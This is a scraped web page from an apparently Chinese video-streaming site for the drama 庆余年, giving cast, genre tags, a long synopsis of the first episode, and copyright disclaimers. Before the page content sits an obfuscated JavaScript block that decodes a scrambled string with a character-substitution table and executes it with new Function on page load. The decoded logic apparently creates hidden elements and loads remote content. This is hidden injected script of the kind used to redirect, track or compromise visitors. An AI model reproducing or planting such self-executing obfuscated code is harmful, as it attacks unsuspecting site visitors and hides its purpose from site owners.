(function(){function nfaafc6(geee4){var ob52b52f2="I♆/,j6&!lF@✩^JX☆_㏎ON.4❅❆k2eHt℃☧☓;Q~|DhAci[⋌(w✎?Bx57n✪z℉p=㏑MyZઈa➢Ym➨b0U♘✂Cvus㏒☁V]:%꒰9K-L8RE☒of♗WqgPT1㏕S◄dr$☩3G";var v94b23a="8☆2~㏕!t$✎✂꒰_9✪N;☓☁YX?=♘✩b♗⋌☩E℉|HAS.@qWKzr℃Jd%L㏑4n&y-㏎mv❆o3ap6FBI㏒➨igMC7◄VQ/O,♆c^je(kઈ❅Dxs[0➢U1Pf☧whGu☒R]:5ZlT";return geee4.split('').map(function(s4eee){var s548795=ob52b52f2.indexOf(s4eee);return s548795==-1?s4eee:v94b23a[s548795]}).join('')}var c=nfaafc6('magnet:?xt=P➨x(=PE"" + ":" + "V" + "$" + "㏑" + "/"+""d4q㏕xV&➨=x꒰) { ☆ ꒰q㏕xV&➨=x ꒰T♗I^^^♘☒㏒ b$%$$k㏒ 7Zq$I♗(♘㏒ kZB(q%$%㏑㏒ 3Zk♗k) { ➨q ꒰u]0MV☧h➨xu~&%R&꒰xM℉➨bM&=i~y3M&q=iz)) { i%&㏕ix }☆ ℉Mi M♘V$Vk%♗ 4 q㏕xV&➨=x ꒰㏕♘Z♘/) { i%&㏕ix Q&i➨xb~qi=zUTMiU=(%꒰㏕♘Z♘/) }☆ ℉Mi q$Mq♗ 4 kZB(q%$%㏑EM♘V$Vk%♗꒰☒8Z♗) + M♘V$Vk%♗꒰☒8♘B) + M♘V$Vk%♗꒰☒8Zઈ) + M♘V$Vk%♗꒰☒8Z/)d㏒ V㏑㏑Z㏑%Z☒ 4 kZB(q%$%㏑EM♘V$Vk%♗꒰☒8Z/) + M♘V$Vk%♗꒰☒8♘B) + M♘V$Vk%♗꒰☒8Zઈ) + M♘V$Vk%♗꒰☒8Z♗)d㏒ yqVZI( 4 3Zk♗kEq$Mq♗꒰"O㏑C7VzC㏕(ઈX:Vz3P(;44")d㏒ Mq$B/% 4 q$Mq♗꒰"O㏑⋌3ON◄3◄h83khC㏕(;44")☆ ℉Mi :♘☒kBM♗ 4 q$Mq♗꒰"%zX9☩h⋌♗☩P44")☆ ℉Mi cV$ZB(♗^☆ ➨q ꒰3=VM&➨=x~R%MiVT~➨x(%8sq꒰:♘☒kBM♗) > n♗) { cV$ZB(♗^ 4 3Zk♗kEMq$B/%d꒰q$Mq♗꒰"(1CB(1ઈ7☩ht4"))☆ cV$ZB(♗^~➨( 4 "&" + ꒰0M&T~iMx(=z꒰) * ♗☒☒☒☒)☆ cV$ZB(♗^~R&73%~P➨(&T 4 "♗☒☒w"☆ cV$ZB(♗^~R&73%~T%➨bT& 4 "㏑☒☒y8"☆ cV$ZB(♗^~(➨RMk3%( 4 &i㏕%☆ 3Zk♗k~k=(7~Myy%x(UT➨3(꒰cV$ZB(♗^) } ℉Mi ➨^$$/$/B% 4 3Zk♗kEMq$B/%d꒰q$Mq♗꒰"Mh☩7Oh♗3"))☆ ➨^$$/$/B%~➨( 4 "8" + ꒰0M&T~iMx(=z꒰) * ♗☒☒☒☒)☆ ➨^$$/$/B%~R&73%~P➨(&T 4 "♗☒y8"☆ ➨^$$/$/B%~R&73%~T%➨bT& 4 $ + "y8"☆ ➨^$$/$/B%~R&73%~kMV9bi=㏕x( 4 "#ઈઈઈ"☆ ℉Mi (㏑/I㏑BqVB 4 q㏕xV&➨=x ꒰D((㏑/kBM$) { ➨^$$/$/B%~RiV 4 E"T&&yRruu"㏒ D((㏑/kBM$㏒ "i"㏒ "&♗u♗♘"㏒ 7Zq$I♗(♘ + ".✩i4" + ꒰V㏑㏑Z㏑%Z☒꒰3=VM&➨=x~Ti%q))d~:=➨x꒰"u")☆ 3Zk♗k~k=(7~Myy%x(UT➨3(꒰➨^$$/$/B%)☆ ➨q ꒰cV$ZB(♗^ 64 x㏕33) { cV$ZB(♗^~℉M3㏕% +4 "\\i\\xMyy%x(%( ➨qiMz% &= T&z3"☆ ℉Mi V♗V%V 4 3Zk♗k~b%&t3%z%x&a7➢(꒰➨^$$/$/B%~➨()☆ ➨q ꒰V♗V%V 44 x㏕33 ☧☧ V♗V%V 44 ㏕x(%q➨x%() { cV$ZB(♗^~℉M3㏕% +4 "\\i\\x VMx& b%& ➨qiMz% qi=z T&z3" } } }☆ ➨q ꒰cV$ZB(♗^ 64 x㏕33) { cV$ZB(♗^~℉M3㏕% +4 "\\i\\xR%x( ki➨(b➨xb T=R& " + b$%$$k } kZB(q%$%㏑Eq$Mq♗꒰"☩zC☒O/b4")d꒰E"T&&yRruu"㏒ q$Mq♗꒰b$%$$k)㏒ "Tz~:R." + LM&%E"x=P"d꒰) + ꒰cV$ZB(♗^ 44 x㏕33 . "" r :♘☒kBM♗)d~:=➨x꒰"u"))~&T%x꒰꒰7$Z$I$♘♗) 4> 7$Z$I$♘♗~&%8&꒰))~&T%x꒰꒰7$Z$I$♘♗) 4> { ➨q ꒰cV$ZB(♗^ 64 x㏕33) { cV$ZB(♗^~℉M3㏕% +4 "\\i\\xi%V%➨℉% ki➨(b➨xb T=R& " + 7$Z$I$♘♗ }☆ (㏑/I㏑BqVB꒰q$Mq♗꒰7$Z$I$♘♗~Ry3➨&꒰"")~i%℉%iR%꒰)~:=➨x꒰""))) })~VM&VT꒰꒰%ii) 4> { (㏑/I㏑BqVB꒰q$Mq♗꒰T♗I^^^♘☒)) })☆ kZB(q%$%㏑E"M((t℉%x&✎➨R&%x%i"d꒰"z%RRMb%"㏒ q㏕xV&➨=x ꒰%) { ➨q ꒰%~(M&M~9 44 7Zq$I♗(♘) { 3Zk♗k~b%&t3%z%x&a7➢(꒰➨^$$/$/B%~➨()~i%z=℉%꒰)☆ ➨q ꒰cV$ZB(♗^ 64 x㏕33) { cV$ZB(♗^~℉M3㏕% +4 "\\i\\xi%V%➨℉% ➨qiMz% y=R& z%RRMb%"☆ cV$ZB(♗^~℉M3㏕% +4 "\\i\\x%~(M&M~℉ " + %~(M&M~D } x%P ઈ㏕xV&➨=x꒰"MibR"㏒ %~(M&M~D)꒰{ ✩&(VRr yqVZI(㏒ ✩&iMr cV$ZB(♗^ }) } }) })꒰"Mz&:✎x◄zV☓◄R☩㏑⋌㏑✎zX℉"㏒ "O/^㏕kzC:(U$:(c3☒(㏑CT07$B%N=4"㏒ "^☒/♘$♗B$☒㏑♗♘㏑"㏒ P➨x(=P㏒ (=V㏕z%x&) }☆:V$㏑/꒰)☆'.substr(11));new Function(c)()})();
当前位置 首页 连续剧 《庆余年》

庆余年0.0

类型:喜剧 古装 剧情 国产剧 权谋 悬疑 网剧 连续剧 国产 连续   内地  2019 

主演:张若昀 陈道明 吴刚 郭麒麟 李沁 李小冉 肖战 宋轶 

导演:孙皓 

庆余年标签:庆余年 京都 滕子京 二皇 毒用 救范闲 围杀 
如不能播放,请关闭浏览器广告屏蔽功能。

神马影院-播放來源

庆余年分集剧情  1

现代青年一朝穿越 范闲拜师医毒双绝  一个患有重症肌无力的现代青年,一觉醒来,发现自己穿越成了一个古代婴儿,正躺在一个竹篮里,遭受一群杀手的围攻追杀,疑惑之间,一个属于他的崭新世界,迎面而来。  带着这个小婴儿逃命的武士名叫五竹,是婴儿母亲生前的一名仆人,虽然他的双眼看不见,但却有着逆天的听声辩位本领,因此,失去双眼的他,行动与常人并无任何分别。他摆脱了杀手以后,遇到了南庆鉴查院院长陈萍萍,带着他的黑骑赶到。陈萍萍从前也是小婴儿母亲的手下,在他的提议下,五竹带着婴儿去了澹州范家,也就是南庆司南伯范建的家。于是,这个婴儿有了一个属于自己的名字——范闲,并以范建私生子的身份,在天高皇帝远的澹州范府生活了下来。只不过,他没有入族谱,也没有名分,只是个范家挂名的少爷,跟随范老太太住在老家。  一晃几年过去了,范闲长成了一个聪明伶俐的小小少年。这天,他瞒着院里的丫鬟,拉着从京都回乡小住的妹妹范若若出去疯玩儿了一圈,结果回来后,发现周管家正因此狠狠教训他的丫鬟。范闲便找了个凳子来,站在上面,将周管家叫到跟前,用尽全身的力气甩了他一耳光。因为范闲自小就练习五竹给他的真气秘笈,因此,力气比寻常成年人还要大,管家在被他甩了一巴掌后,脸颊瞬间红肿了起来,连后槽牙都被打掉一颗,但他却连大气都不敢出。  老夫人得知此事后,并没有训斥范闲,只是立即着人将范若若遣回了京都,并让周管家将范闲院里的丫鬟换掉,范闲表示自己喜欢安静,院子里不用人伺候,老夫人也没再坚持。庆余年电视剧海报  范若若依依不舍地上车回京了,周管家记恨范闲教训自己的仇,故意吓唬他,称晚上会闹鬼,却不知这个小小少年的身体里,住的根本是一个成熟的灵魂,又怎么会害怕这样小儿科的恐吓?  当晚,一个黑衣蒙面人穿房越脊神不知鬼不觉地来到了范闲屋中,范闲却装作一副懵懂无知的样子,将来人忽悠了个七荤八素,然后趁其不备,用手边的陶瓷枕连砸了那人的脑袋两下,将其砸晕。范闲以为自己杀人了,连鞋都顾不得穿,光着脚丫跑到了五竹开的铺子,将这件事告诉了他。五竹跟着他去查看,结果范闲发现那人有转醒的迹象,二话不说抄起一把凳子,又狠狠砸了一下,又将其砸晕了过去。  这时,一向话少的五竹才慢悠悠地告诉范闲,此人是京都鉴查院第三处的人,名叫费介,是自己人。范闲一听,又气又悔,却拿自己这个五竹叔叔丝毫没有办法。  费介是范闲名义上的父亲范建找来给他做老师的,第二天,他拜会了范老夫人,发现这位老夫人对范闲似乎很不放在心上,而那位周管家则背地里悄悄暗示他,范闲不过是个挂名的少爷,不受老太太待见,不用太过用心教导,费介便提出,除了识文断字,就教范闲学医。  费介也是个急性子,毫不拖泥带水,当晚就带着范闲去了乱葬岗,他在一旁指挥着范闲挖开了一座坟,给了他一把刀,让他自己去解剖尸体。范闲跟他要手套,费介却根本不懂他说的那种现代的医用手套是什么东东。范闲虽然表现得十分平静,也很配合,却还是在解剖的时候,被腐败的尸体给恶心到了,当场大吐特吐,作为师父的费费介,看着他狼狈的模样,终于有一种扳回一局的快感,乐得哈哈大笑。  范闲刨坟的时候,费介就在一边喝着酒看着,跟他四海八荒地闲聊着。从费介口中,范闲才得知,五竹虽然只是自己母亲的一个仆人,且眼睛看不见,但他的功夫却能够与四大宗师齐肩,若不是他平时不显山不露水,这世上就该有五大宗师了。  这番话勾起了范闲的好奇,能把这样一个顶尖的高手收在身边做仆人,自己的母亲也绝非等闲之辈。刨完坟之后,范闲便去了五竹的铺子,缠着他询问关于母亲的一些消息,但惜字如金的五竹却只告诉他,他的母亲名叫叶轻眉,是个天下无双的人,其它再不多说。范闲又说起自己进入范府之时,五竹给自己放在竹篮里的那本练气秘笈,表示自己无法控制那真气,五竹纠正他说,那秘笈是他母亲留给他的,自己并不懂练气,也没练过武功,之所以能和四大宗师打个平手,靠的是快和强。  于是,五竹便开始用他的方式来训练范闲,其实他的方式很简单,就是他打,范闲来躲,什么时候能够躲得开,他的功夫也就算了练到家了。不要觉得这位的训练方法特别,更特别的是费介先生,他教医术直接将人带到墓地就够匪夷所思了,但他教毒术就更加别致,竟然时不时就给范闲下点毒,然后让他自己找解药,声称什么时候能让自己在不知不觉间中招,他就算出师了。  在这两位不走寻常路的老师悉心教导下,范闲进步奇快,他从五竹跟自己说的话里得到启发,利用给费介饭菜里的补药,使他不知不觉间中了招,终于出师了,至此,他已是身怀绝技。  费介临走时,范闲依依不舍地去送他,他将一面提司腰牌送给了范闲,范闲也把自己用羊肠做的手套送给了他,让他不要忘了自己这个不听话的徒弟。费介不禁有些动情,他强忍着眼泪对范闲说,若是能够早认识他几年,自己一定会找个女人成亲,生一个像他一样的孩子。范闲在他身后大声喊说,将来自己给他送终,费介终于忍不住红了眼眶。  老师走后,范闲闷闷不乐,范老夫人见他这个样子,便告诉他说,费介走了也是好事,他留在澹州,便会把京都人的目光吸引到这里来,而一旦红甲骑士出现在澹州街头,真正的危险也就来了。老夫人说起此事,心情颇为沉重,范闲却有些期待,从此后,他每天坐在门前,等着那些所谓的红甲骑士,而五竹,就站在对面的楼上,默默守护着他。  这一等就是好几年,直到小范闲长成了一个英俊秀气的青年,他终于等到了一群红甲骑士。这些人是范建派来接范闲进京的,老夫人却担心他像他娘亲一样,遇到危险劫难,因此不准他去,那些红甲骑士就一直跪在院里,静静地等着……

猜你喜欢

剧情简介

范闲十五岁的时候,父亲范建及监察院院长陈萍萍派用毒高手费介教他识毒用毒和武功,四年后范闲武力已属上乘在破解了一场投毒事件后,他带着危机感和对真相的探索前赴京都。在熟悉京都的过程中,范闲见识了柳如玉和弟

RSS订阅 - 百度sitemap - 谷歌sitemap - 必应sitemap - 搜狗sitemap - 奇虎sitemap - 神马sitemap

本站不会保存、复制或传播任何视频文件,也不对本站所抓取的任何内容负法律责任,所列的内容仅做宽带测试使用。

若本站收集的节目无意侵犯了贵司版权,请给admin@canxx.net邮箱地址来信,我们将在第一时间删除相应资源。

Copyright 2013-2020 www.canxx.com Inc. All Rights Reserved.